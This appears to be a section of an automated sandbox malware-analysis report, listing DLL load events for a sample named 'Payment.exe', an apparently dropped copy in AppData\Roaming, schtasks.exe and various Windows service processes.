Source: C:\Users\user\Desktop\Payment.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: drprov.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winsta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntlanman.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: davclnt.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: davhlpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: wkscli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: cscapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: comres.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcvsp1res.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxoci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: oci.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.perception.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mediafoundation.defaultperceptionprovider.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: icu.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: spectrumsyncclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: perceptionsimulationextensions.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: hid.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: holographicruntimes.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: perceptiondevice.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: spatialstore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: esent.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: analogcommonproxystub.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: icu.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: esent.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: version.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\vds.exe	Section loaded: atl.dll
Source: C:\Windows\System32\vds.exe	Section loaded: osuninst.dll
Source: C:\Windows\System32\vds.exe	Section loaded: vdsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uexfat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ifsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uudf.dll
Source: C:\Windows\System32\vds.exe	Section loaded: untfs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ufat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: fmifs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: virtdisk.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: spp.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: wer.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fveapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Section loaded: dpapi.dll
